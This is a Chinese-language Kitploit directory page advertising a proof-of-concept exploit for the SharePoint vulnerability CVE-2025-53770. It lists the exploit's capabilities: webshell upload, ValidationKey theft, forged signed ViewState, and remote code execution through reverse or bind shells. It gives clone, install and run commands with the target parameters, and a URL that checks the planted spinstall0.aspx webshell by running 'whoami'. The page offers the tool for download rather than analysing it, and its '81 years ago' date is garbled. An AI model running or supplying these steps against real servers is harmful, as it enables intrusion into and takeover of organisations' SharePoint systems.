Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Toolshell_CVE-2025-53770 — 针对CVE-2025-53770的利用PoC,实现webshell上传到SharePoint、ValidationKey提取、签名ViewState生成,以及通过反向或绑定shell进行远程代码执行。 | Kitploit
工具/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具
GitHubgreenforcenetworks/toolshell_cve-2025-53770

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Toolshell_CVE-2025-53770

针对CVE-2025-53770的利用PoC,实现webshell上传到SharePoint、ValidationKey提取、签名ViewState生成,以及通过反向或绑定shell进行远程代码执行。

查看仓库
81年前尚未审核

ToolShell → CVE‑2025‑53770 漏洞利用 PoC

该软件包允许:

  1. 上传 webshell 到 SharePoint
  2. 提取 ValidationKey
  3. 生成签名的 ViewState
  4. 通过反向/绑定 shell 实现 RCE

🔧 设置

git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 运行

上传 webshell

从 SharePoint 页面中,您可以访问页面源代码。只需转到“查看源代码”选项卡,如果存在,您将获得以下内容,可以复制:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (任何当前用于上下文的 __VIEWSTATE)

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

这将上传 spinstall0.aspx。 检查: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

下载工具